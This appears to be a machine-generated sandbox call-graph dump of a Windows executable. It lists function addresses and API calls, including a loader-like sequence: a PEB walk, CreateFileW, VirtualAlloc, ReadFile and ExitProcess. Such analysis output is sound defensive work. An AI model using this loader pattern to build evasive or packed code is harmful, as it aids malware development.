47085 c63d1d 47083->47085 47095 c24fdc 47083->47095 47168 c242a2 CreateStreamOnHGlobal 47084->47168 47179 c9304d 74 API calls 47085->47179 47088 c63d22 47090 c2511f 64 API calls 47088->47090 47089 c250f5 40 API calls 47089->47095 47091 c63d45 47090->47091 47092 c250f5 40 API calls 47091->47092 47094 c2506e messages 47092->47094 47094->46999 47095->47088 47095->47089 47095->47094 47174 c2511f 47095->47174 47097 c25107 47096->47097 47099 c63d70 47096->47099 47201 c4e8c4 47097->47201 47101 c928fe 47222 c9274e 47101->47222 47103 c92919 47103->47006 47106 c4e536 CallCatchBlock 47104->47106 47105 c4e544 47129 c4f2d9 20 API calls __dosmaperr 47105->47129 47106->47105 47109 c4e574 47106->47109 47108 c4e549 47130 c527ec 26 API calls __wsopen_s 47108->47130 47111 c4e586 47109->47111 47112 c4e579 
47109->47112 47121 c58061 47111->47121 47131 c4f2d9 20 API calls __dosmaperr 47112->47131 47115 c4e58f 47116 c4e595 47115->47116 47117 c4e5a2 47115->47117 47132 c4f2d9 20 API calls __dosmaperr 47116->47132 47133 c4e5d4 LeaveCriticalSection __fread_nolock 47117->47133 47118 c4e554 __wsopen_s 47118->47073 47122 c5806d CallCatchBlock 47121->47122 47134 c52f5e EnterCriticalSection 47122->47134 47124 c5807b 47135 c580fb 47124->47135 47128 c580ac __wsopen_s 47128->47115 47129->47108 47130->47118 47131->47118 47132->47118 47133->47118 47134->47124 47137 c5811e 47135->47137 47136 c58177 47154 c54c7d 20 API calls __dosmaperr 47136->47154 47137->47136 47144 c58088 47137->47144 47152 c4918d EnterCriticalSection 47137->47152 47153 c491a1 LeaveCriticalSection 47137->47153 47140 c58180 47155 c529c8 47140->47155 47142 c58189 47142->47144 47161 c53405 11 API calls 2 library calls 47142->47161 47149 c580b7 47144->47149 47145 c581a8 47162 c4918d EnterCriticalSection 47145->47162 47148 c581bb 47148->47144 47164 c52fa6 LeaveCriticalSection 47149->47164 47151 c580be 47151->47128 47152->47137 47153->47137 47154->47140 47156 c529fc __dosmaperr 47155->47156 47157 c529d3 RtlFreeHeap 47155->47157 47156->47142 47157->47156 47158 c529e8 47157->47158 47163 c4f2d9 20 API calls __dosmaperr 47158->47163 47160 c529ee GetLastError 47160->47156 47161->47145 47162->47148 47163->47160 47164->47151 47166 c3fddb 22 API calls 47165->47166 47167 c25734 47166->47167 47167->47083 47169 c242bc FindResourceExW 47168->47169 47170 c242d9 47168->47170 47169->47170 47171 c635ba LoadResource 47169->47171 47170->47095 47171->47170 47172 c635cf SizeofResource 47171->47172 47172->47170 47173 c635e3 LockResource 47172->47173 47173->47170 47175 c63d90 47174->47175 47176 c2512e 47174->47176 47180 c4ece3 47176->47180 47179->47088 47183 c4eaaa 47180->47183 47182 c2513c 47182->47095 47185 c4eab6 CallCatchBlock 47183->47185 47184 c4eac2 47196 c4f2d9 20 API calls __dosmaperr 47184->47196 47185->47184 47186 c4eae8 
47185->47186 47198 c4918d EnterCriticalSection 47186->47198 47189 c4eac7 47197 c527ec 26 API calls __wsopen_s 47189->47197 47190 c4eaf4 47199 c4ec0a 62 API calls 2 library calls 47190->47199 47193 c4eb08 47200 c4eb27 LeaveCriticalSection __fread_nolock 47193->47200 47195 c4ead2 __wsopen_s 47195->47182 47196->47189 47197->47195 47198->47190 47199->47193 47200->47195 47204 c4e8e1 47201->47204 47203 c25118 47203->47101 47205 c4e8ed CallCatchBlock 47204->47205 47206 c4e900 ___scrt_fastfail 47205->47206 47207 c4e92d 47205->47207 47208 c4e925 __wsopen_s 47205->47208 47217 c4f2d9 20 API calls __dosmaperr 47206->47217 47219 c4918d EnterCriticalSection 47207->47219 47208->47203 47210 c4e937 47220 c4e6f8 38 API calls 4 library calls 47210->47220 47213 c4e91a 47218 c527ec 26 API calls __wsopen_s 47213->47218 47214 c4e94e 47221 c4e96c LeaveCriticalSection __fread_nolock 47214->47221 47217->47213 47218->47208 47219->47210 47220->47214 47221->47208 47225 c4e4e8 47222->47225 47224 c9275d 47224->47103 47228 c4e469 47225->47228 47227 c4e505 47227->47224 47229 c4e48c 47228->47229 47230 c4e478 47228->47230 47235 c4e488 __alldvrm 47229->47235 47238 c5333f 11 API calls 2 library calls 47229->47238 47236 c4f2d9 20 API calls __dosmaperr 47230->47236 47232 c4e47d 47237 c527ec 26 API calls __wsopen_s 47232->47237 47235->47227 47236->47232 47237->47235 47238->47235 47241 c92e7a 47239->47241 47240 c250f5 40 API calls 47240->47241 47241->47240 47242 c928fe 27 API calls 47241->47242 47243 c92d3b 47241->47243 47244 c2511f 64 API calls 47241->47244 47242->47241 47243->47013 47243->47031 47244->47241 47246 c922d9 47245->47246 47247 c922e7 47245->47247 47248 c4e5eb 29 API calls 47246->47248 47249 c9232c 47247->47249 47250 c4e5eb 29 API calls 47247->47250 47273 c922f0 47247->47273 47248->47247 47274 c92557 40 API calls __fread_nolock 47249->47274 47251 c92311 47250->47251 47251->47249 47256 c9231a 47251->47256 47253 c92370 47254 c92395 47253->47254 47255 c92374 47253->47255 47275 c92171 
47254->47275 47257 c92381 47255->47257 47260 c4e678 67 API calls 47255->47260 47256->47273 47282 c4e678 47256->47282 47262 c4e678 67 API calls 47257->47262 47257->47273 47260->47257 47261 c9239d 47263 c923c3 47261->47263 47264 c923a3 47261->47264 47262->47273 47295 c923f3 74 API calls 47263->47295 47266 c923b0 47264->47266 47267 c4e678 67 API calls 47264->47267 47268 c4e678 67 API calls 47266->47268 47266->47273 47267->47266 47268->47273 47269 c923de 47272 c4e678 67 API calls 47269->47272 47269->47273 47270 c923ca 47270->47269 47271 c4e678 67 API calls 47270->47271 47271->47269 47272->47273 47273->47031 47274->47253 47276 c4ea0c ___std_exception_copy 21 API calls 47275->47276 47277 c9217f 47276->47277 47278 c4ea0c ___std_exception_copy 21 API calls 47277->47278 47279 c92190 47278->47279 47280 c4ea0c ___std_exception_copy 21 API calls 47279->47280 47281 c9219c 47280->47281 47281->47261 47283 c4e684 CallCatchBlock 47282->47283 47284 c4e695 47283->47284 47285 c4e6aa 47283->47285 47313 c4f2d9 20 API calls __dosmaperr 47284->47313 47294 c4e6a5 __wsopen_s 47285->47294 47296 c4918d EnterCriticalSection 47285->47296 47288 c4e69a 47314 c527ec 26 API calls __wsopen_s 47288->47314 47289 c4e6c6 47297 c4e602 47289->47297 47292 c4e6d1 47315 c4e6ee LeaveCriticalSection __fread_nolock 47292->47315 47294->47273 47295->47270 47296->47289 47298 c4e624 47297->47298 47299 c4e60f 47297->47299 47311 c4e61f 47298->47311 47316 c4dc0b 47298->47316 47348 c4f2d9 20 API calls __dosmaperr 47299->47348 47302 c4e614 47349 c527ec 26 API calls __wsopen_s 47302->47349 47308 c4e646 47333 c5862f 47308->47333 47311->47292 47312 c529c8 _free 20 API calls 47312->47311 47313->47288 47314->47294 47315->47294 47317 c4dc23 47316->47317 47318 c4dc1f 47316->47318 47317->47318 47319 c4d955 __fread_nolock 26 API calls 47317->47319 47322 c54d7a 47318->47322 47320 c4dc43 47319->47320 47350 c559be 62 API calls 3 library calls 47320->47350 47323 c4e640 47322->47323 47324 c54d90 47322->47324 47326 c4d955 47323->47326 
47324->47323 47325 c529c8 _free 20 API calls 47324->47325 47325->47323 47327 c4d976 47326->47327 47328 c4d961 47326->47328 47327->47308 47351 c4f2d9 20 API calls __dosmaperr 47328->47351 47330 c4d966 47352 c527ec 26 API calls __wsopen_s 47330->47352 47332 c4d971 47332->47308 47334 c58653 47333->47334 47335 c5863e 47333->47335 47337 c5868e 47334->47337 47340 c5867a 47334->47340 47356 c4f2c6 20 API calls __dosmaperr 47335->47356 47358 c4f2c6 20 API calls __dosmaperr 47337->47358 47339 c58643 47357 c4f2d9 20 API calls __dosmaperr 47339->47357 47353 c58607 47340->47353 47341 c58693 47359 c4f2d9 20 API calls __dosmaperr 47341->47359 47345 c4e64c 47345->47311 47345->47312 47346 c5869b 47360 c527ec 26 API calls __wsopen_s 47346->47360 47348->47302 47349->47311 47350->47318 47351->47330 47352->47332 47361 c58585 47353->47361 47355 c5862b 47355->47345 47356->47339 47357->47345 47358->47341 47359->47346 47360->47345 47362 c58591 CallCatchBlock 47361->47362 47372 c55147 EnterCriticalSection 47362->47372 47364 c5859f 47365 c585c6 47364->47365 47366 c585d1 47364->47366 47373 c586ae 47365->47373 47388 c4f2d9 20 API calls __dosmaperr 47366->47388 47369 c585cc 47389 c585fb LeaveCriticalSection __wsopen_s 47369->47389 47371 c585ee __wsopen_s 47371->47355 47372->47364 47390 c553c4 47373->47390 47375 c586c4 47403 c55333 21 API calls 2 library calls 47375->47403 47377 c586be 47377->47375 47379 c553c4 __wsopen_s 26 API calls 47377->47379 47387 c586f6 47377->47387 47378 c5871c 47385 c5873e 47378->47385 47404 c4f2a3 20 API calls __dosmaperr 47378->47404 47381 c586ed 47379->47381 47380 c553c4 __wsopen_s 26 API calls 47382 c58702 CloseHandle 47380->47382 47386 c553c4 __wsopen_s 26 API calls 47381->47386 47382->47375 47383 c5870e GetLastError 47382->47383 47383->47375 47385->47369 47386->47387 47387->47375 47387->47380 47388->47369 47389->47371 47391 c553d1 47390->47391 47395 c553e6 47390->47395 47392 c4f2c6 __dosmaperr 20 API calls 47391->47392 47394 c553d6 47392->47394 47393 c4f2c6 
__dosmaperr 20 API calls 47396 c55416 47393->47396 47397 c4f2d9 __dosmaperr 20 API calls 47394->47397 47395->47393 47398 c5540b 47395->47398 47399 c4f2d9 __dosmaperr 20 API calls 47396->47399 47400 c553de 47397->47400 47398->47377 47401 c5541e 47399->47401 47400->47377 47402 c527ec __wsopen_s 26 API calls 47401->47402 47402->47400 47403->47378 47404->47385 47406 c29cc2 _wcslen 47405->47406 47407 c3fe0b 22 API calls 47406->47407 47408 c29cea __fread_nolock 47407->47408 47409 c3fddb 22 API calls 47408->47409 47410 c29d00 47409->47410 47410->46890 47411->46907 47412 c22b83 7 API calls 47415 c22cd4 7 API calls 47412->47415 47414 c22c5e 47415->47414 47416 c22c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 47417 c58402 47422 c581be 47417->47422 47420 c5842a 47423 c581ef try_get_first_available_module 47422->47423 47433 c58338 47423->47433 47437 c48e0b 40 API calls 2 library calls 47423->47437 47425 c583ee 47441 c527ec 26 API calls __wsopen_s 47425->47441 47427 c58343 47427->47420 47434 c60984 47427->47434 47429 c5838c 47429->47433 47438 c48e0b 40 API calls 2 library calls 47429->47438 47431 c583ab 47431->47433 47439 c48e0b 40 API calls 2 library calls 47431->47439 47433->47427 47440 c4f2d9 20 API calls __dosmaperr 47433->47440 47442 c60081 47434->47442 47436 c6099f 47436->47420 47437->47429 47438->47431 47439->47433 47440->47425 47441->47427 47445 c6008d CallCatchBlock 47442->47445 47443 c6009b 47500 c4f2d9 20 API calls __dosmaperr 47443->47500 47445->47443 47447 c600d4 47445->47447 47446 c600a0 47501 c527ec 26 API calls __wsopen_s 47446->47501 47453 c6065b 47447->47453 47452 c600aa __wsopen_s 47452->47436 47503 c6042f 47453->47503 47456 c606a6 47521 c55221 47456->47521 47457 c6068d 47535 c4f2c6 20 API calls __dosmaperr 47457->47535 47460 c606ab 47461 c606b4 47460->47461 47462 c606cb 47460->47462 47537 c4f2c6 20 API calls __dosmaperr 47461->47537 47534 c6039a CreateFileW 47462->47534 47466 c60704 47468 c60781 GetFileType 47466->47468 47470 c60756 GetLastError 
47466->47470 47539 c6039a CreateFileW 47466->47539 47467 c606b9 47538 c4f2d9 20 API calls __dosmaperr 47467->47538 47471 c6078c GetLastError 47468->47471 47473 c607d3 47468->47473 47540 c4f2a3 20 API calls __dosmaperr 47470->47540 47541 c4f2a3 20 API calls __dosmaperr 47471->47541 47472 c60692 47536 c4f2d9 20 API calls __dosmaperr 47472->47536 47543 c5516a 21 API calls 2 library calls 47473->47543 47477 c6079a CloseHandle 47477->47472 47480 c607c3 47477->47480 47479 c60749 47479->47468 47479->47470 47542 c4f2d9 20 API calls __dosmaperr 47480->47542 47481 c607f4 47483 c60840 47481->47483 47544 c605ab 72 API calls 3 library calls 47481->47544 47488 c6086d 47483->47488 47545 c6014d 72 API calls 4 library calls 47483->47545 47484 c607c8 47484->47472 47487 c60866 47487->47488 47489 c6087e 47487->47489 47490 c586ae __wsopen_s 29 API calls 47488->47490 47491 c600f8 47489->47491 47492 c608fc CloseHandle 47489->47492 47490->47491 47502 c60121 LeaveCriticalSection __wsopen_s 47491->47502 47546 c6039a CreateFileW 47492->47546 47494 c60927 47495 c6095d 47494->47495 47496 c60931 GetLastError 47494->47496 47495->47491 47547 c4f2a3 20 API calls __dosmaperr 47496->47547 47498 c6093d 47548 c55333 21 API calls 2 library calls 47498->47548 47500->47446 47501->47452 47502->47452 47504 c6046a 47503->47504 47505 c60450 47503->47505 47549 c603bf 47504->47549 47505->47504 47556 c4f2d9 20 API calls __dosmaperr 47505->47556 47508 c6045f 47557 c527ec 26 API calls __wsopen_s 47508->47557 47510 c604a2 47511 c604d1 47510->47511 47558 c4f2d9 20 API calls __dosmaperr 47510->47558 47512 c60524 47511->47512 47560 c4d70d 26 API calls 2 library calls 47511->47560 47512->47456 47512->47457 47515 c6051f 47515->47512 47518 c6059e 47515->47518 47516 c604c6 47559 c527ec 26 API calls __wsopen_s 47516->47559 47561 c527fc 11 API calls _abort 47518->47561 47520 c605aa 47522 c5522d CallCatchBlock 47521->47522 47564 c52f5e EnterCriticalSection 47522->47564 47524 c55259 47568 c55000 21 API calls 3 library calls 
47524->47568 47527 c552a4 __wsopen_s 47527->47460 47528 c55234 47528->47524 47530 c552c7 EnterCriticalSection 47528->47530 47531 c5527b 47528->47531 47529 c5525e 47529->47531 47569 c55147 EnterCriticalSection 47529->47569 47530->47531 47532 c552d4 LeaveCriticalSection 47530->47532 47565 c5532a 47531->47565 47532->47528 47534->47466 47535->47472 47536->47491 47537->47467 47538->47472 47539->47479 47540->47472 47541->47477 47542->47484 47543->47481 47544->47483 47545->47487 47546->47494 47547->47498 47548->47495 47551 c603d7 47549->47551 47550 c603f2 47550->47510 47551->47550 47562 c4f2d9 20 API calls __dosmaperr 47551->47562 47553 c60416 47563 c527ec 26 API calls __wsopen_s 47553->47563 47555 c60421 47555->47510 47556->47508 47557->47504 47558->47516 47559->47511 47560->47515 47561->47520 47562->47553 47563->47555 47564->47528 47570 c52fa6 LeaveCriticalSection 47565->47570 47567 c55331 47567->47527 47568->47529 47569->47531 47570->47567 47571 c910c0 47572 c910fa 47571->47572 47577 c910cd 47571->47577 47573 c910fc 47615 c3fa11 53 API calls 47573->47615 47575 c91101 47582 c27510 47575->47582 47577->47572 47577->47573 47577->47575 47580 c910f4 47577->47580 47614 c2b270 39 API calls 47580->47614 47583 c27522 47582->47583 47584 c27525 47582->47584 47605 c26350 47583->47605 47585 c2755b 47584->47585 47586 c2752d 47584->47586 47587 c650f6 47585->47587 47590 c2756d 47585->47590 47597 c6500f 47585->47597 47616 c451c6 26 API calls 47586->47616 47619 c45183 26 API calls 47587->47619 47617 c3fb21 51 API calls 47590->47617 47591 c2753d 47594 c3fddb 22 API calls 47591->47594 47592 c6510e 47592->47592 47596 c27547 47594->47596 47598 c29cb3 22 API calls 47596->47598 47599 c3fe0b 22 API calls 47597->47599 47604 c65088 47597->47604 47598->47583 47600 c65058 47599->47600 47601 c3fddb 22 API calls 47600->47601 47602 c6507f 47601->47602 47603 c29cb3 22 API calls 47602->47603 47603->47604 47618 c3fb21 51 API calls 47604->47618 47606 c26362 47605->47606 47607 c64a51 47605->47607 47620 
c26373 47606->47620 47630 c24a88 22 API calls __fread_nolock 47607->47630 47610 c64a5b 47612 c64a67 47610->47612 47631 c2a8c7 22 API calls __fread_nolock 47610->47631 47611 c2636e 47611->47572 47614->47572 47615->47575 47616->47591 47617->47591 47618->47587 47619->47592 47622 c26382 47620->47622 47626 c263b6 __fread_nolock 47620->47626 47621 c64a82 47625 c3fddb 22 API calls 47621->47625 47622->47621 47623 c263a9 47622->47623 47622->47626 47632 c2a587 47623->47632 47627 c64a91 47625->47627 47626->47611 47628 c3fe0b 22 API calls 47627->47628 47629 c64ac5 __fread_nolock 47628->47629 47630->47610 47631->47612 47633 c2a59d 47632->47633 47636 c2a598 __fread_nolock 47632->47636 47634 c3fe0b 22 API calls 47633->47634 47635 c6f80f 47633->47635 47634->47636 47636->47626 47637 c2344d 47638 c2345d __wsopen_s 47637->47638 47639 c2a961 22 API calls 47638->47639 47640 c23513 47639->47640 47668 c23a5a 47640->47668 47642 c2351c 47675 c23357 47642->47675 47647 c2515f 22 API calls 47648 c23544 47647->47648 47649 c2a961 22 API calls 47648->47649 47650 c2354d 47649->47650 47651 c2a6c3 22 API calls 47650->47651 47652 c23556 RegOpenKeyExW 47651->47652 47653 c63176 RegQueryValueExW 47652->47653 47657 c23578 47652->47657 47654 c63193 47653->47654 47655 c6320c RegCloseKey 47653->47655 47656 c3fe0b 22 API calls 47654->47656 47655->47657 47667 c6321e _wcslen 47655->47667 47658 c631ac 47656->47658 47659 c25722 22 API calls 47658->47659 47660 c631b7 RegQueryValueExW 47659->47660 47661 c631d4 47660->47661 47664 c631ee messages 47660->47664 47662 c26b57 22 API calls 47661->47662 47662->47664 47663 c24c6d 22 API calls 47663->47667 47664->47655 47665 c29cb3 22 API calls 47665->47667 47666 c2515f 22 API calls 47666->47667 47667->47657 47667->47663 47667->47665 47667->47666 47669 c61f50 __wsopen_s 47668->47669 47670 c23a67 GetModuleFileNameW 47669->47670 47671 c29cb3 22 API calls 47670->47671 47672 c23a8d 47671->47672 47673 c23aa2 23 API calls 47672->47673 47674 c23a97 47673->47674 47674->47642 47676 
c61f50 __wsopen_s 47675->47676 47677 c23364 GetFullPathNameW 47676->47677 47678 c23386 47677->47678 47679 c26b57 22 API calls 47678->47679 47680 c233a4 47679->47680 47681 c233c6 47680->47681 47682 c630bb 47681->47682 47683 c233dd 47681->47683 47685 c3fddb 22 API calls 47682->47685 47690 c233ee 47683->47690 47687 c630c5 _wcslen 47685->47687 47686 c233e8 47686->47647 47688 c3fe0b 22 API calls 47687->47688 47689 c630fe __fread_nolock 47688->47689 47691 c233fe _wcslen 47690->47691 47692 c23411 47691->47692 47693 c6311d 47691->47693 47694 c2a587 22 API calls 47692->47694 47695 c3fddb 22 API calls 47693->47695 47696 c2341e __fread_nolock 47694->47696 47697 c63127 47695->47697 47696->47686 47698 c3fe0b 22 API calls 47697->47698 47699 c63157 __fread_nolock 47698->47699 47700 c210f3 47736 c21398 47700->47736 47704 c2116a 47705 c2a961 22 API calls 47704->47705 47706 c21174 47705->47706 47707 c2a961 22 API calls 47706->47707 47708 c2117e 47707->47708 47709 c2a961 22 API calls 47708->47709 47710 c21188 47709->47710 47711 c2a961 22 API calls 47710->47711 47712 c211c6 47711->47712 47713 c2a961 22 API calls 47712->47713 47714 c21292 47713->47714 47746 c2171c 47714->47746 47718 c212c4 47719 c2a961 22 API calls 47718->47719 47720 c212ce 47719->47720 47767 c31940 47720->47767 47722 c212f9 47777 c21aab 47722->47777 47724 c21315 47725 c21325 GetStdHandle 47724->47725 47726 c62485 47725->47726 47727 c2137a 47725->47727 47726->47727 47728 c6248e 47726->47728 47730 c21387 OleInitialize 47727->47730 47729 c3fddb 22 API calls 47728->47729 47731 c62495 47729->47731 47784 c9011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 47731->47784 47733 c6249e 47785 c90944 CreateThread 47733->47785 47735 c624aa CloseHandle 47735->47727 47786 c213f1 47736->47786 47739 c213f1 22 API calls 47740 c213d0 47739->47740 47741 c2a961 22 API calls 47740->47741 47742 c213dc 47741->47742 47743 c26b57 22 API calls 47742->47743 47744 c21129 47743->47744 
47745 c21bc3 6 API calls 47744->47745 47745->47704 47747 c2a961 22 API calls 47746->47747 47748 c2172c 47747->47748 47749 c2a961 22 API calls 47748->47749 47750 c21734 47749->47750 47751 c2a961 22 API calls 47750->47751 47752 c2174f 47751->47752 47753 c3fddb 22 API calls 47752->47753 47754 c2129c 47753->47754 47755 c21b4a 47754->47755 47756 c21b58 47755->47756 47757 c2a961 22 API calls 47756->47757 47758 c21b63 47757->47758 47759 c2a961 22 API calls 47758->47759 47760 c21b6e 47759->47760 47761 c2a961 22 API calls 47760->47761 47762 c21b79 47761->47762 47763 c2a961 22 API calls 47762->47763 47764 c21b84 47763->47764 47765 c3fddb 22 API calls 47764->47765 47766 c21b96 RegisterWindowMessageW 47765->47766 47766->47718 47768 c31981 47767->47768 47775 c3195d 47767->47775 47793 c40242 5 API calls __Init_thread_wait 47768->47793 47771 c3198b 47771->47775 47794 c401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47771->47794 47772 c38727 47776 c3196e 47772->47776 47796 c401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47772->47796 47775->47776 47795 c40242 5 API calls __Init_thread_wait 47775->47795 47776->47722 47778 c21abb 47777->47778 47779 c6272d 47777->47779 47781 c3fddb 22 API calls 47778->47781 47797 c93209 23 API calls 47779->47797 47783 c21ac3 47781->47783 47782 c62738 47783->47724 47784->47733 47785->47735 47798 c9092a 28 API calls 47785->47798 47787 c2a961 22 API calls 47786->47787 47788 c213fc 47787->47788 47789 c2a961 22 API calls 47788->47789 47790 c21404 47789->47790 47791 c2a961 22 API calls 47790->47791 47792 c213c6 47791->47792 47792->47739 47793->47771 47794->47775 47795->47772 47796->47776 47797->47782 47799 c2b710 47800 c2b72b 47799->47800 47801 c70146 47800->47801 47802 c700f8 47800->47802 47828 c2b750 47800->47828 47858 ca58a2 196 API calls __Init_thread_footer 47801->47858 47805 c70102 47802->47805 47806 c7010f 47802->47806 47802->47828 47856 ca5d33 196 API calls 47805->47856 47825 c2ba20 47806->47825 47857 ca61d0 
196 API calls __Init_thread_footer 47806->47857 47811 c3d336 40 API calls 47811->47828 47812 c703d9 47812->47812 47814 c2bbe0 40 API calls 47814->47828 47817 c2ba4e 47818 c70322 47862 ca5c0c 82 API calls 47818->47862 47825->47817 47863 c9359c 82 API calls __wsopen_s 47825->47863 47828->47811 47828->47814 47828->47817 47828->47818 47828->47825 47830 c2ec40 47828->47830 47847 c2a81b 41 API calls 47828->47847 47848 c3d2f0 40 API calls 47828->47848 47849 c3a01b 196 API calls 47828->47849 47850 c40242 5 API calls __Init_thread_wait 47828->47850 47851 c3edcd 22 API calls 47828->47851 47852 c400a3 29 API calls __onexit 47828->47852 47853 c401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47828->47853 47854 c3ee53 82 API calls 47828->47854 47855 c3e5ca 196 API calls 47828->47855 47859 c2aceb 23 API calls messages 47828->47859 47860 c7f6bf 23 API calls 47828->47860 47861 c2a8c7 22 API calls __fread_nolock 47828->47861 47845 c2ec76 messages 47830->47845 47831 c40242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 47831->47845 47832 c9359c 82 API calls 47836 c74af7 47832->47836 47833 c3fddb 22 API calls 47833->47845 47836->47832 47837 c74b0b 47867 c9359c 82 API calls __wsopen_s 47837->47867 47840 c2a8c7 22 API calls 47840->47845 47841 c2a961 22 API calls 47841->47845 47842 c2ed9d messages 47842->47828 47843 c400a3 29 API calls 47843->47845 47844 c2f3ae messages 47844->47836 47844->47842 47866 c9359c 82 API calls __wsopen_s 47844->47866 47845->47831 47845->47833 47845->47836 47845->47837 47845->47840 47845->47841 47845->47842 47845->47843 47845->47844 47846 c401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 47845->47846 47864 c301e0 196 API calls 2 library calls 47845->47864 47865 c306a0 41 API calls messages 47845->47865 47846->47845 47847->47828 47848->47828 47849->47828 47850->47828 47851->47828 47852->47828 47853->47828 47854->47828 47855->47828 47856->47806 
47857->47825 47858->47828 47859->47828 47860->47828 47861->47828 47862->47825 47863->47812 47864->47845 47865->47845 47866->47836 47867->47836 47868 c24c91 47869 c2a961 22 API calls 47868->47869 47870 c24cff 47869->47870 47875 c23af0 47870->47875 47873 c24d9c 47874 c24dba 47873->47874 47878 c251f7 22 API calls __fread_nolock 47873->47878 47879 c23b1c 47875->47879 47878->47873 47880 c23b0f 47879->47880 47881 c23b29 47879->47881 47880->47873 47881->47880 47882 c23b30 RegOpenKeyExW 47881->47882 47882->47880 47883 c23b4a RegQueryValueExW 47882->47883 47884 c23b80 RegCloseKey 47883->47884 47885 c23b6b 47883->47885 47884->47880 47885->47884 47886 c3fc70 47887 c3fc85 47886->47887 47888 c3fd1d VirtualProtect 47887->47888 47889 c3fceb 47887->47889 47888->47889 47890 314bf60 47904 3149bb0 47890->47904 47892 314c02b 47907 314be50 47892->47907 47894 314c054 CreateFileW 47896 314c0a3 47894->47896 47897 314c0a8 47894->47897 47897->47896 47898 314c0bf VirtualAlloc 47897->47898 47898->47896 47899 314c0dd ReadFile 47898->47899 47899->47896 47900 314c0f8 47899->47900 47901 314ae50 13 API calls 47900->47901 47902 314c12b 47901->47902 47903 314c14e ExitProcess 47902->47903 47903->47896 47910 314d050 GetPEB 47904->47910 47906 314a23b 47906->47892 47908 314be59 Sleep 47907->47908 47909 314be67 47908->47909 47911 314d07a 47910->47911 47911->47906 47912 c23156 47915 c23170 47912->47915 47916 c23187 47915->47916 47917 c231e9 47916->47917 47918 c231eb 47916->47918 47919 c2318c 47916->47919 47920 c231d0 DefWindowProcW 47917->47920 47921 c231f1 47918->47921 47922 c62dfb 47918->47922 47923 c23265 PostQuitMessage 47919->47923 47924 c23199 47919->47924 47925 c2316a 47920->47925 47926 c231f8 47921->47926 47927 c2321d SetTimer RegisterWindowMessageW 47921->47927 47975 c218e2 10 API calls 47922->47975 47923->47925 47929 c231a4 47924->47929 47930 c62e7c 47924->47930 47931 c23201 KillTimer 47926->47931 47932 c62d9c 47926->47932 47927->47925 47934 c23246 CreatePopupMenu 47927->47934 47935 c231ae 
47929->47935 47936 c62e68 47929->47936 47979 c8bf30 34 API calls ___scrt_fastfail 47930->47979 47971 c230f2 Shell_NotifyIconW ___scrt_fastfail 47931->47971 47938 c62dd7 MoveWindow 47932->47938 47939 c62da1 47932->47939 47933 c62e1c 47976 c3e499 42 API calls 47933->47976 47934->47925 47943 c62e4d 47935->47943 47944 c231b9 47935->47944 47978 c8c161 27 API calls ___scrt_fastfail 47936->47978 47938->47925 47946 c62dc6 SetFocus 47939->47946 47947 c62da7 47939->47947 47943->47920 47977 c80ad7 22 API calls 47943->47977 47950 c231c4 47944->47950 47951 c23253 47944->47951 47945 c62e8e 47945->47920 47945->47925 47946->47925 47947->47950 47952 c62db0 47947->47952 47948 c23214 47972 c23c50 DeleteObject DestroyWindow 47948->47972 47949 c23263 47949->47925 47950->47920 47960 c230f2 Shell_NotifyIconW ___scrt_fastfail 47950->47960 47973 c2326f 44 API calls ___scrt_fastfail 47951->47973 47974 c218e2 10 API calls 47952->47974 47958 c62e41 47961 c23837 47958->47961 47960->47958 47962 c23862 ___scrt_fastfail 47961->47962 47980 c24212 47962->47980 47965 c238e8 47967 c63386 Shell_NotifyIconW 47965->47967 47968 c23906 Shell_NotifyIconW 47965->47968 47984 c23923 47968->47984 47970 c2391c 47970->47917 47971->47948 47972->47925 47973->47949 47974->47925 47975->47933 47976->47950 47977->47917 47978->47949 47979->47945 47981 c635a4 47980->47981 47982 c238b7 47980->47982 47981->47982 47983 c635ad DestroyIcon 47981->47983 47982->47965 48006 c8c874 42 API calls _strftime 47982->48006 47983->47982 47985 c23a13 47984->47985 47986 c2393f 47984->47986 47985->47970 48007 c26270 47986->48007 47989 c63393 LoadStringW 47992 c633ad 47989->47992 47990 c2395a 47991 c26b57 22 API calls 47990->47991 47993 c2396f 47991->47993 48000 c23994 ___scrt_fastfail 47992->48000 48012 c2a8c7 22 API calls __fread_nolock 47992->48012 47994 c2397c 47993->47994 47995 c633c9 47993->47995 47994->47992 47997 c23986 47994->47997 47998 c26350 22 API calls 47995->47998 47999 c26350 22 API calls 47997->47999 48001 c633d7 
                                                                      (Continuation of the preceding function's control-flow graph node list; the rendered graph is omitted. API calls along this graph: Shell_NotifyIconW, GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary; CRT calls __fread_nolock, __wsopen_s.)

                                                                      Control-flow Graph (entry c242de; rendered graph and executed/not-executed colouring omitted). API calls along the graph: GetVersionExW, GetCurrentProcess, IsWow64Process, GetSystemInfo, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary; subcalls c2a961, c26b57, c293b2, c237a0.
                                                                      APIs
                                                                      • GetVersionExW.KERNEL32(?), ref: 00C2430D
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • GetCurrentProcess.KERNEL32(?,00CBCB64,00000000,?,?), ref: 00C24422
                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C24429
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C24454
                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C24466
                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C24474
                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C2447B
                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00C244A0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
